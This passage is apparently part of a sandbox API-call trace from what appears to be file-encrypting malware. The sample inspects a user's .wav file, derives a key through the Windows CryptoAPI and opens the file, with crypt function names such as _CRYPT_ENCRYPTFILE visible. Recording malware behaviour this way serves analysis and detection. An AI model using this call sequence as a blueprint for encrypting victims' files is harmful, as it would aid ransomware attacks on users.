cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.873] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.873] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.873] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.874] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.874] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0x90ae18 [0187.874] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.875] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.875] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.875] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.875] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.876] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.876] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.877] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.877] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.878] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.895] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.895] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.895] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.895] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.896] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.896] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.896] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.896] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.897] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.897] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.897] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0187.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.898] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.898] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0187.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.898] CryptDestroyHash (hHash=0x90af58) returned 1 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\tcz4fpeq.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.901] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.901] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.902] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, 